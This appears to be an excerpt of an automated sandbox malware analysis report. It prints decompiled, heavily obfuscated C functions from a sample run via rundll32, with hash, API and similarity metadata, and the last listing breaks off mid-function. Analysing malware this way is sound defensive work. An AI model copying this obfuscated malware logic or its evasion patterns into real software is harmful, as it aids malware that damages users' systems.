                                                                                                                                                            • Instruction ID: bfadb7d2174a0241a095134e479ea31a791fbf3bee7c7bf14baef03f82ca2dc5
                                                                                                                                                            • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                                            • Instruction Fuzzy Hash: 487122710083419BC769DF65C98681BBBE2FBC8758F508A1DF29A96220C3B5DA588F43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00389BCF() {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				signed int _v524;
                                                                                                                                                            				signed int _v528;
                                                                                                                                                            				signed int _v532;
                                                                                                                                                            				signed int _v536;
                                                                                                                                                            				unsigned int _v540;
                                                                                                                                                            				signed int _v544;
                                                                                                                                                            				signed int _v548;
                                                                                                                                                            				signed int _v552;
                                                                                                                                                            				signed int _v556;
                                                                                                                                                            				signed int _v560;
                                                                                                                                                            				signed int _v564;
                                                                                                                                                            				signed int _v568;
                                                                                                                                                            				signed int _t111;
                                                                                                                                                            				signed int _t115;
                                                                                                                                                            				signed int _t117;
                                                                                                                                                            				void* _t118;
                                                                                                                                                            				signed int _t132;
                                                                                                                                                            				void* _t134;
                                                                                                                                                            				signed int _t135;
                                                                                                                                                            				signed int* _t136;
                                                                                                                                                            
                                                                                                                                                            				_t136 =  &_v568;
                                                                                                                                                            				_v560 = 0x297e3c;
                                                                                                                                                            				_v560 = _v560 >> 9;
                                                                                                                                                            				_t118 = 0x4ead2fe;
                                                                                                                                                            				_v560 = _v560 + 0xe8be;
                                                                                                                                                            				_v560 = _v560 ^ 0xc9c09221;
                                                                                                                                                            				_v560 = _v560 ^ 0xc9c20db8;
                                                                                                                                                            				_v540 = 0x190e1d;
                                                                                                                                                            				_v540 = _v540 >> 7;
                                                                                                                                                            				_v540 = _v540 >> 0xd;
                                                                                                                                                            				_v540 = _v540 ^ 0x000cdd3b;
                                                                                                                                                            				_v544 = 0x86c2f0;
                                                                                                                                                            				_v544 = _v544 | 0x0d7eac20;
                                                                                                                                                            				_v544 = _v544 ^ 0xe6b61282;
                                                                                                                                                            				_v544 = _v544 ^ 0xeb41e563;
                                                                                                                                                            				_v552 = 0x262f60;
                                                                                                                                                            				_v552 = _v552 ^ 0x76c91adc;
                                                                                                                                                            				_v552 = _v552 + 0xd1c5;
                                                                                                                                                            				_v552 = _v552 ^ 0x76fc323e;
                                                                                                                                                            				_v524 = 0xf427e0;
                                                                                                                                                            				_v524 = _v524 + 0xffff22a3;
                                                                                                                                                            				_v524 = _v524 ^ 0x00f85f52;
                                                                                                                                                            				_v548 = 0xdbc1a5;
                                                                                                                                                            				_v548 = _v548 >> 0xb;
                                                                                                                                                            				_v548 = _v548 + 0xf615;
                                                                                                                                                            				_v548 = _v548 ^ 0x0006ff3e;
                                                                                                                                                            				_v556 = 0xd2f840;
                                                                                                                                                            				_v556 = _v556 * 0x5f;
                                                                                                                                                            				_t134 = 0;
                                                                                                                                                            				_v556 = _v556 ^ 0x4e4cccaa;
                                                                                                                                                            				_v568 = 0x74ecfa;
                                                                                                                                                            				_t132 = 0x53;
                                                                                                                                                            				_t133 = _v556;
                                                                                                                                                            				_v568 = _v568 / _t132;
                                                                                                                                                            				_v568 = _v568 ^ 0xc72664ff;
                                                                                                                                                            				_v568 = _v568 << 0xf;
                                                                                                                                                            				_v568 = _v568 ^ 0x862d9f40;
                                                                                                                                                            				_v536 = 0xc0d44a;
                                                                                                                                                            				_v536 = _v536 + 0x396d;
                                                                                                                                                            				_t135 = _v556;
                                                                                                                                                            				_t117 = _v556;
                                                                                                                                                            				_v536 = _v536 * 0x46;
                                                                                                                                                            				_v536 = _v536 ^ 0x34c6c601;
                                                                                                                                                            				_v532 = 0xf37e83;
                                                                                                                                                            				_v532 = _v532 << 8;
                                                                                                                                                            				_v532 = _v532 | 0x760e0a19;
                                                                                                                                                            				_v532 = _v532 ^ 0xf77c332a;
                                                                                                                                                            				_v528 = 0x91f8e3;
                                                                                                                                                            				_v528 = _v528 ^ 0xc904aca2;
                                                                                                                                                            				_v528 = _v528 ^ 0xc9900919;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t118 != 0x27fe330) {
                                                                                                                                                            						if(_t118 == 0x4ead2fe) {
                                                                                                                                                            							_t118 = 0x96d401d;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t118 == 0x7ac597b) {
                                                                                                                                                            								_t117 = E0037B6CF( &_v520, _v548, _v556, _v568);
                                                                                                                                                            								_t118 = 0xa7595e6;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t118 == 0x80b0e4e) {
                                                                                                                                                            									_t90 =  &_v552; // 0xeb41e563
                                                                                                                                                            									_t111 = E00379B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
                                                                                                                                                            									_t136 =  &(_t136[4]);
                                                                                                                                                            									__eflags = _t111;
                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                            										_t118 = 0x7ac597b;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t118 == 0x96d401d) {
                                                                                                                                                            										_t115 = E003752C2();
                                                                                                                                                            										_t133 = _t115;
                                                                                                                                                            										__eflags = _t115;
                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                            											_t118 = 0x80b0e4e;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t118 != 0xa7595e6) {
                                                                                                                                                            											goto L15;
                                                                                                                                                            										} else {
                                                                                                                                                            											_t135 = E00372051(_v532, _t117, _v528);
                                                                                                                                                            											_t118 = 0x27fe330;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L16;
                                                                                                                                                            					}
                                                                                                                                                            					_v564 = 0x69bdc3;
                                                                                                                                                            					_v564 = _v564 | 0xfd1bce6c;
                                                                                                                                                            					_v564 = _v564 ^ 0xf153ffb6;
                                                                                                                                                            					_v564 = _v564 ^ 0x260f00bb;
                                                                                                                                                            					__eflags = _t135 - _v564;
                                                                                                                                                            					_t134 =  ==  ? 1 : _t134;
                                                                                                                                                            					_t118 = 0x8b668cc;
                                                                                                                                                            					L15:
                                                                                                                                                            					__eflags = _t118 - 0x8b668cc;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				L16:
                                                                                                                                                            				return _t134;
                                                                                                                                                            			}

























                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: <~)$`/&$cA$m9
                                                                                                                                                            • API String ID: 0-2671356241
                                                                                                                                                            • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                                            • Instruction ID: 7c47a60a2af08b902b2851dce1eca2a9fb35aea2a77d77fb77c6a1054ef9fa51
                                                                                                                                                            • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                                            • Instruction Fuzzy Hash: 725183710083019FC398CE21C09942BBBE1FFD8758F541E1EF9A6A6260D3B4CA098F86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                            			E00379B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				char _v52;
                                                                                                                                                            				void* _v64;
                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                            				void* _t115;
                                                                                                                                                            				signed int _t130;
                                                                                                                                                            				signed int _t131;
                                                                                                                                                            				void* _t133;
                                                                                                                                                            
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_v52 = 0x104;
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(0x104);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(0x104);
                                                                                                                                                            				_v68 = 0x342964;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_t133 = 0;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_v40 = 0xa3a3c;
                                                                                                                                                            				_v40 = _v40 + 0x2c25;
                                                                                                                                                            				_v40 = _v40 ^ 0x000a7661;
                                                                                                                                                            				_v16 = 0x75ee44;
                                                                                                                                                            				_t130 = 0x7a;
                                                                                                                                                            				_v16 = _v16 / _t130;
                                                                                                                                                            				_v16 = _v16 ^ 0xc9e42672;
                                                                                                                                                            				_v16 = _v16 ^ 0xc9e58a7e;
                                                                                                                                                            				_v8 = 0x386b92;
                                                                                                                                                            				_v8 = _v8 << 4;
                                                                                                                                                            				_v8 = _v8 | 0x0ec9a536;
                                                                                                                                                            				_v8 = _v8 >> 0xf;
                                                                                                                                                            				_v8 = _v8 ^ 0x000b4478;
                                                                                                                                                            				_v44 = 0xd66787;
                                                                                                                                                            				_v44 = _v44 >> 3;
                                                                                                                                                            				_v44 = _v44 ^ 0x001d593f;
                                                                                                                                                            				_v24 = 0x7c5a73;
                                                                                                                                                            				_v24 = _v24 | 0xae316990;
                                                                                                                                                            				_t131 = 0x19;
                                                                                                                                                            				_v24 = _v24 / _t131;
                                                                                                                                                            				_v24 = _v24 ^ 0x06f0967a;
                                                                                                                                                            				_v20 = 0x3dfd52;
                                                                                                                                                            				_v20 = _v20 >> 8;
                                                                                                                                                            				_v20 = _v20 * 0x24;
                                                                                                                                                            				_v20 = _v20 ^ 0x0009affd;
                                                                                                                                                            				_v12 = 0xf0c6a5;
                                                                                                                                                            				_v12 = _v12 + 0xffff2be4;
                                                                                                                                                            				_v12 = _v12 + 0x1686;
                                                                                                                                                            				_v12 = _v12 << 2;
                                                                                                                                                            				_v12 = _v12 ^ 0x03c3840c;
                                                                                                                                                            				_v48 = 0x30c967;
                                                                                                                                                            				_v48 = _v48 | 0xcae095b2;
                                                                                                                                                            				_v48 = _v48 ^ 0xcaf7f966;
                                                                                                                                                            				_v36 = 0xabcbdc;
                                                                                                                                                            				_v36 = _v36 + 0xfffff856;
                                                                                                                                                            				_v36 = _v36 | 0xb2b71321;
                                                                                                                                                            				_v36 = _v36 ^ 0xb2b3c312;
                                                                                                                                                            				_v32 = 0xda8dbe;
                                                                                                                                                            				_v32 = _v32 + 0xffff364b;
                                                                                                                                                            				_v32 = _v32 | 0x02598b37;
                                                                                                                                                            				_v32 = _v32 ^ 0x02d31c0a;
                                                                                                                                                            				_v28 = 0x528ee8;
                                                                                                                                                            				_v28 = _v28 * 0x12;
                                                                                                                                                            				_v28 = _v28 << 2;
                                                                                                                                                            				_v28 = _v28 ^ 0x17383776;
                                                                                                                                                            				_t115 = E003791DD(__ecx, _v40, __ecx);
                                                                                                                                                            				_t132 = _t115;
                                                                                                                                                            				if(_t115 != 0) {
                                                                                                                                                            					_t133 = E003776AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
                                                                                                                                                            					E00381E67(_v48, _v36, _v32, _v28, _t132);
                                                                                                                                                            				}
                                                                                                                                                            				return _t133;
                                                                                                                                                            			}






















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Du$av$d)4$sZ|
                                                                                                                                                            • API String ID: 0-269012183
                                                                                                                                                            • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                                            • Instruction ID: 2e8441b25c343f3657b39cad97ac7a6d66c0c9b3727e48abeca232a953e41045
                                                                                                                                                            • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                                            • Instruction Fuzzy Hash: 0C5112B1D00209EBDF19DFE5C94A8EEBBB1FB48318F108159E412B6260D3755A59DFA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                                                            • GetACP.KERNEL32 ref: 1004377E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4232894706-0
                                                                                                                                                            • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                                            • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                                                            • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                                            • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                                            • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                                                            • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                                            • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E00380E53(void* __ecx) {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				char _v1040;
                                                                                                                                                            				char _v1560;
                                                                                                                                                            				char _v2080;
                                                                                                                                                            				char _v2600;
                                                                                                                                                            				signed int _v2604;
                                                                                                                                                            				signed int _v2608;
                                                                                                                                                            				signed int _v2612;
                                                                                                                                                            				signed int _v2616;
                                                                                                                                                            				signed int _v2620;
                                                                                                                                                            				signed int _v2624;
                                                                                                                                                            				signed int _v2628;
                                                                                                                                                            				signed int _v2632;
                                                                                                                                                            				signed int _v2636;
                                                                                                                                                            				signed int _v2640;
                                                                                                                                                            				signed int _v2644;
                                                                                                                                                            				signed int _v2648;
                                                                                                                                                            				signed int _v2652;
                                                                                                                                                            				signed int _v2656;
                                                                                                                                                            				signed int _v2660;
                                                                                                                                                            				signed int _v2664;
                                                                                                                                                            				signed int _v2668;
                                                                                                                                                            				signed int _v2672;
                                                                                                                                                            				signed int _v2676;
                                                                                                                                                            				signed int _v2680;
                                                                                                                                                            				signed int _v2684;
                                                                                                                                                            				signed int _v2688;
                                                                                                                                                            				signed int _v2692;
                                                                                                                                                            				signed int _v2696;
                                                                                                                                                            				signed int _v2700;
                                                                                                                                                            				signed int _v2704;
                                                                                                                                                            				signed int _v2708;
                                                                                                                                                            				signed int _v2712;
                                                                                                                                                            				signed int _v2716;
                                                                                                                                                            				signed int _v2720;
                                                                                                                                                            				signed int _v2724;
                                                                                                                                                            				signed int _v2728;
                                                                                                                                                            				signed int _v2732;
                                                                                                                                                            				signed int _v2736;
                                                                                                                                                            				signed int _v2740;
                                                                                                                                                            				signed int _v2744;
                                                                                                                                                            				signed int _v2748;
                                                                                                                                                            				signed int _v2752;
                                                                                                                                                            				signed int _v2756;
                                                                                                                                                            				signed int _v2760;
                                                                                                                                                            				signed int _v2764;
                                                                                                                                                            				signed int _v2768;
                                                                                                                                                            				signed int _v2772;
                                                                                                                                                            				signed int _t406;
                                                                                                                                                            				signed int _t426;
                                                                                                                                                            				signed int _t427;
                                                                                                                                                            				signed int _t428;
                                                                                                                                                            				signed int _t429;
                                                                                                                                                            				signed int _t430;
                                                                                                                                                            				signed int _t435;
                                                                                                                                                            				void* _t467;
                                                                                                                                                            				void* _t468;
                                                                                                                                                            				signed int* _t472;
                                                                                                                                                            
                                                                                                                                                            				_t472 =  &_v2772;
                                                                                                                                                            				_v2700 = 0xd36ba7;
                                                                                                                                                            				_v2700 = _v2700 << 7;
                                                                                                                                                            				_v2700 = _v2700 ^ 0xaed70c65;
                                                                                                                                                            				_v2700 = _v2700 ^ 0xc762dfcc;
                                                                                                                                                            				_v2652 = 0x6f4609;
                                                                                                                                                            				_t9 =  &_v2652; // 0x6f4609
                                                                                                                                                            				_v2652 =  *_t9 * 0x1c;
                                                                                                                                                            				_t467 = __ecx;
                                                                                                                                                            				_v2652 = _v2652 ^ 0x0c23569d;
                                                                                                                                                            				_t468 = 0xea1969c;
                                                                                                                                                            				_v2608 = 0xb8394b;
                                                                                                                                                            				_v2608 = _v2608 + 0xaeb5;
                                                                                                                                                            				_v2608 = _v2608 ^ 0x00b390c3;
                                                                                                                                                            				_v2736 = 0x3d33f1;
                                                                                                                                                            				_v2736 = _v2736 + 0xffffd537;
                                                                                                                                                            				_v2736 = _v2736 + 0xffffb6ee;
                                                                                                                                                            				_v2736 = _v2736 + 0xbad8;
                                                                                                                                                            				_v2736 = _v2736 ^ 0x003e0409;
                                                                                                                                                            				_v2768 = 0xd1d4ce;
                                                                                                                                                            				_v2768 = _v2768 >> 0xc;
                                                                                                                                                            				_v2768 = _v2768 ^ 0xb5c37fe4;
                                                                                                                                                            				_v2768 = _v2768 + 0x4eb3;
                                                                                                                                                            				_v2768 = _v2768 ^ 0xb5c2c9c4;
                                                                                                                                                            				_v2760 = 0x157bbd;
                                                                                                                                                            				_v2760 = _v2760 ^ 0x6d7617e7;
                                                                                                                                                            				_v2760 = _v2760 ^ 0x1b56cd2f;
                                                                                                                                                            				_v2760 = _v2760 ^ 0xfb63426d;
                                                                                                                                                            				_v2760 = _v2760 ^ 0x8d577604;
                                                                                                                                                            				_v2604 = 0x1fac8b;
                                                                                                                                                            				_v2604 = _v2604 + 0x9962;
                                                                                                                                                            				_v2604 = _v2604 ^ 0x0029d956;
                                                                                                                                                            				_v2696 = 0x3d46b4;
                                                                                                                                                            				_v2696 = _v2696 | 0x3d7fd3ff;
                                                                                                                                                            				_v2696 = _v2696 ^ 0x3d7bd02d;
                                                                                                                                                            				_v2720 = 0xad1695;
                                                                                                                                                            				_t426 = 9;
                                                                                                                                                            				_v2720 = _v2720 * 0x4b;
                                                                                                                                                            				_v2720 = _v2720 >> 0x10;
                                                                                                                                                            				_v2720 = _v2720 << 0xe;
                                                                                                                                                            				_v2720 = _v2720 ^ 0x0cab1f79;
                                                                                                                                                            				_v2644 = 0xe14118;
                                                                                                                                                            				_v2644 = _v2644 ^ 0x82369820;
                                                                                                                                                            				_v2644 = _v2644 ^ 0x82de8a4e;
                                                                                                                                                            				_v2668 = 0x391c30;
                                                                                                                                                            				_v2668 = _v2668 >> 7;
                                                                                                                                                            				_v2668 = _v2668 + 0xffff3589;
                                                                                                                                                            				_v2668 = _v2668 ^ 0xfff6d862;
                                                                                                                                                            				_v2692 = 0x9dbc3;
                                                                                                                                                            				_v2692 = _v2692 << 8;
                                                                                                                                                            				_v2692 = _v2692 * 0x75;
                                                                                                                                                            				_v2692 = _v2692 ^ 0x81749ad9;
                                                                                                                                                            				_v2660 = 0x144a46;
                                                                                                                                                            				_v2660 = _v2660 >> 0xd;
                                                                                                                                                            				_v2660 = _v2660 ^ 0x0008b8c7;
                                                                                                                                                            				_v2752 = 0x703c03;
                                                                                                                                                            				_v2752 = _v2752 * 0x74;
                                                                                                                                                            				_v2752 = _v2752 ^ 0x2e54cb21;
                                                                                                                                                            				_v2752 = _v2752 | 0x6f17e683;
                                                                                                                                                            				_v2752 = _v2752 ^ 0x7f96e2f0;
                                                                                                                                                            				_v2676 = 0xa438e5;
                                                                                                                                                            				_v2676 = _v2676 / _t426;
                                                                                                                                                            				_v2676 = _v2676 + 0x92ff;
                                                                                                                                                            				_v2676 = _v2676 ^ 0x0015b827;
                                                                                                                                                            				_v2612 = 0x1c48b9;
                                                                                                                                                            				_t427 = 0x1a;
                                                                                                                                                            				_v2612 = _v2612 / _t427;
                                                                                                                                                            				_v2612 = _v2612 ^ 0x000154fb;
                                                                                                                                                            				_v2628 = 0x490198;
                                                                                                                                                            				_v2628 = _v2628 | 0x561f6486;
                                                                                                                                                            				_v2628 = _v2628 ^ 0x565ec1b9;
                                                                                                                                                            				_v2616 = 0xcec4ed;
                                                                                                                                                            				_t428 = 0x3d;
                                                                                                                                                            				_v2616 = _v2616 * 9;
                                                                                                                                                            				_v2616 = _v2616 ^ 0x074f393e;
                                                                                                                                                            				_v2636 = 0x4be85b;
                                                                                                                                                            				_v2636 = _v2636 >> 1;
                                                                                                                                                            				_v2636 = _v2636 ^ 0x002afd34;
                                                                                                                                                            				_v2728 = 0xca47ed;
                                                                                                                                                            				_v2728 = _v2728 << 1;
                                                                                                                                                            				_v2728 = _v2728 / _t428;
                                                                                                                                                            				_v2728 = _v2728 >> 3;
                                                                                                                                                            				_v2728 = _v2728 ^ 0x00084593;
                                                                                                                                                            				_v2620 = 0x793301;
                                                                                                                                                            				_v2620 = _v2620 | 0xccc0d5da;
                                                                                                                                                            				_v2620 = _v2620 ^ 0xccf56683;
                                                                                                                                                            				_v2684 = 0xd6c9e7;
                                                                                                                                                            				_v2684 = _v2684 >> 8;
                                                                                                                                                            				_v2684 = _v2684 + 0x30fc;
                                                                                                                                                            				_v2684 = _v2684 ^ 0x000dbf27;
                                                                                                                                                            				_v2656 = 0x6cf887;
                                                                                                                                                            				_v2656 = _v2656 | 0x54469415;
                                                                                                                                                            				_v2656 = _v2656 ^ 0x5469dd96;
                                                                                                                                                            				_v2712 = 0x1ba43e;
                                                                                                                                                            				_v2712 = _v2712 + 0xffff54b6;
                                                                                                                                                            				_v2712 = _v2712 >> 0x10;
                                                                                                                                                            				_v2712 = _v2712 ^ 0x536d0b9d;
                                                                                                                                                            				_v2712 = _v2712 ^ 0x5368fd88;
                                                                                                                                                            				_v2744 = 0x7fa81e;
                                                                                                                                                            				_v2744 = _v2744 + 0x45dd;
                                                                                                                                                            				_v2744 = _v2744 | 0xcc5c3b14;
                                                                                                                                                            				_t429 = 0x76;
                                                                                                                                                            				_v2744 = _v2744 * 0x48;
                                                                                                                                                            				_v2744 = _v2744 ^ 0x83f6fb81;
                                                                                                                                                            				_v2704 = 0x73cce1;
                                                                                                                                                            				_v2704 = _v2704 >> 6;
                                                                                                                                                            				_v2704 = _v2704 | 0x0e0742c3;
                                                                                                                                                            				_v2704 = _v2704 ^ 0x0e0521c8;
                                                                                                                                                            				_v2764 = 0x3737a7;
                                                                                                                                                            				_v2764 = _v2764 >> 0xb;
                                                                                                                                                            				_v2764 = _v2764 << 3;
                                                                                                                                                            				_v2764 = _v2764 + 0x14ac;
                                                                                                                                                            				_v2764 = _v2764 ^ 0x0004654a;
                                                                                                                                                            				_v2772 = 0xaeb57f;
                                                                                                                                                            				_v2772 = _v2772 / _t429;
                                                                                                                                                            				_v2772 = _v2772 << 0xf;
                                                                                                                                                            				_t430 = 0x37;
                                                                                                                                                            				_v2772 = _v2772 / _t430;
                                                                                                                                                            				_v2772 = _v2772 ^ 0x037ee988;
                                                                                                                                                            				_v2648 = 0x954498;
                                                                                                                                                            				_t431 = 0x4b;
                                                                                                                                                            				_v2648 = _v2648 / _t431;
                                                                                                                                                            				_v2648 = _v2648 ^ 0x00054dec;
                                                                                                                                                            				_v2640 = 0x8be41e;
                                                                                                                                                            				_v2640 = _v2640 >> 0xd;
                                                                                                                                                            				_v2640 = _v2640 ^ 0x00089615;
                                                                                                                                                            				_v2748 = 0xfabe1b;
                                                                                                                                                            				_v2748 = _v2748 ^ 0xff42a680;
                                                                                                                                                            				_v2748 = _v2748 + 0xffff8ee7;
                                                                                                                                                            				_v2748 = _v2748 + 0x1c5a;
                                                                                                                                                            				_v2748 = _v2748 ^ 0xffbaa703;
                                                                                                                                                            				_v2756 = 0x33a01d;
                                                                                                                                                            				_v2756 = _v2756 * 0x6f;
                                                                                                                                                            				_v2756 = _v2756 << 4;
                                                                                                                                                            				_v2756 = _v2756 >> 4;
                                                                                                                                                            				_v2756 = _v2756 ^ 0x066d94da;
                                                                                                                                                            				_v2672 = 0x7cb69f;
                                                                                                                                                            				_v2672 = _v2672 << 4;
                                                                                                                                                            				_v2672 = _v2672 * 0x4a;
                                                                                                                                                            				_v2672 = _v2672 ^ 0x40c5c2d0;
                                                                                                                                                            				_v2680 = 0xc0e1f8;
                                                                                                                                                            				_v2680 = _v2680 << 1;
                                                                                                                                                            				_v2680 = _v2680 | 0xa5ca1830;
                                                                                                                                                            				_v2680 = _v2680 ^ 0xa5ca6401;
                                                                                                                                                            				_v2732 = 0xd52773;
                                                                                                                                                            				_v2732 = _v2732 ^ 0x8b84e9f5;
                                                                                                                                                            				_v2732 = _v2732 + 0xffffa58a;
                                                                                                                                                            				_v2732 = _v2732 >> 1;
                                                                                                                                                            				_v2732 = _v2732 ^ 0x45a69f9f;
                                                                                                                                                            				_v2740 = 0x525c84;
                                                                                                                                                            				_v2740 = _v2740 * 0x45;
                                                                                                                                                            				_v2740 = _v2740 << 0xd;
                                                                                                                                                            				_v2740 = _v2740 + 0xffffe485;
                                                                                                                                                            				_v2740 = _v2740 ^ 0x5df42895;
                                                                                                                                                            				_v2688 = 0x8afd1b;
                                                                                                                                                            				_v2688 = _v2688 >> 0xa;
                                                                                                                                                            				_v2688 = _v2688 * 0x44;
                                                                                                                                                            				_v2688 = _v2688 ^ 0x000c822b;
                                                                                                                                                            				_v2632 = 0xb6ec99;
                                                                                                                                                            				_v2632 = _v2632 + 0xffff2a9a;
                                                                                                                                                            				_v2632 = _v2632 ^ 0x00b1db1a;
                                                                                                                                                            				_v2664 = 0xfa37e2;
                                                                                                                                                            				_v2664 = _v2664 * 0x4c;
                                                                                                                                                            				_v2664 = _v2664 + 0x9251;
                                                                                                                                                            				_v2664 = _v2664 ^ 0x4a4e0c53;
